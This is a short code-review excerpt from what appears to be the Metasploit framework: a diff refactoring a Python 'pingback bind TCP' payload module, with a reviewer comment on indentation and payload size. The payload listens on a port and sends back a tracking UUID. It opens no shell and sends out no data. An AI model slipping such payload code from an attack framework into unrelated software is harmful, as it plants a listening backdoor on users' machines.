modules/payloads/singles/python/pingback_bind_tcp.rb

```diff
@@ -27,30 +27,22 @@ def initialize(info = {})
   end
 
   def generate
-    super + command_string
+    command_string
   end
-
   def command_string
     self.pingback_uuid ||= self.generate_pingback_uuid
-
-    cmd  = "import socket as s\n"
-    cmd << "so=s.socket(s.AF_INET,s.SOCK_STREAM)\n"
-    cmd << "try:\n"
-    cmd << " so.setsockopt(s.SOL_SOCKET, s.SO_REUSEADDR, 1)\n"
-    cmd << " so.bind(('0.0.0.0',#{ datastore['LPORT']}))\n"
-    cmd << " so.listen(1)\n"
-    cmd << " so,addr=so.accept()\n"
-    cmd << " so.send('#{self.pingback_uuid.gsub('-','')}'.decode('hex'))\n"
-    cmd << " so.close()\n"
-    cmd << "except:\n"
-    cmd << " pass\n"
-
-   cmd
- end
-
-  def include_send_pingback
-    true
+    cmd = <<~PYTHON
+      import socket as s
+      so=s.socket(s.AF_INET,s.SOCK_STREAM)
+      try:
+        so.setsockopt(s.SOL_SOCKET, s.SO_REUSEADDR, 1)
```

Comment:
I think these were originally single-space indented to save some space. I don't care that much, but I think the payload size will need to be updated.